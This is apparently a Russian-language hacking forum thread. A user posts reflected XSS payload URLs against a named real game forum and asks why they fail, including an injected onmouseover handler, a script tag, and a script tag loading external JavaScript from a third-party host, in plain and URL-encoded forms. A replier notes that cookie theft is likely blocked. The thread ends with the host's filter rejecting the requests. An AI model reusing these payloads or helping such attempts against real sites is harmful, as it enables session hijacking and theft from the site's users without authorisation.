![]() |
Всем привет не могу использовать найденную xss
вот сама пасивка http://piratia-world.ru/forum/index.php/%F6%22%20onmouseover=prompt">alert('xss') [url]http://piratia-world.ru/forum/index.php/%F6%22%20onmouseover=prompt%22%3E%3Cscript%3Ealert ('xss')%3C/script%3E если сделать [url]http://piratia-world.ru/forum/index.php/%F6%22%20onmouseover=prompt%3CSCRIPT type=text/javascript src=http://httpz.ru/160u4vl3pjgo.js> перекидывает на http://sweb.ru/insecure Запрос отвергнут Запрос небезопасен и был отвергнут. Если это Ваш сайт — обратитесь в отдел технической поддержки за разъяснениями. Или может я что не правильно делаю, или это вообще не уязвимость Помогите, и объясните что не так.. |
У них фильтр не пускает вообщем ни на какой сайт,тоесть куки скорее всего украсть ты несможеш
|
пробывал, не получается, может что не правильно делаю...
[url]http://piratia-world.ru/forum/index.php/%F6%22%20onmouseover=prompt%25%33%43%53%43%52%49%5 0%54%20%74%79%70%65%3D%74%65%78%74%2F%6A%61%76%61% 73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F %2F%68%74%74%70%7A%2E%72%75%2F%31%36%30%75%34%76%6 C%33%70%6A%67%6F%2E%6A%73%3E%3C%2F%53%43%52%49%50% 54%3E выдает Not Found The requested URL /forum/index.php/ö" onmouseover=prompt%3CSCRIPT type=text/javascript src=http://httpz.ru/160u4vl3pjgo.js> was not found on this server. |
XSS не работает.
|
| Время: 20:57 |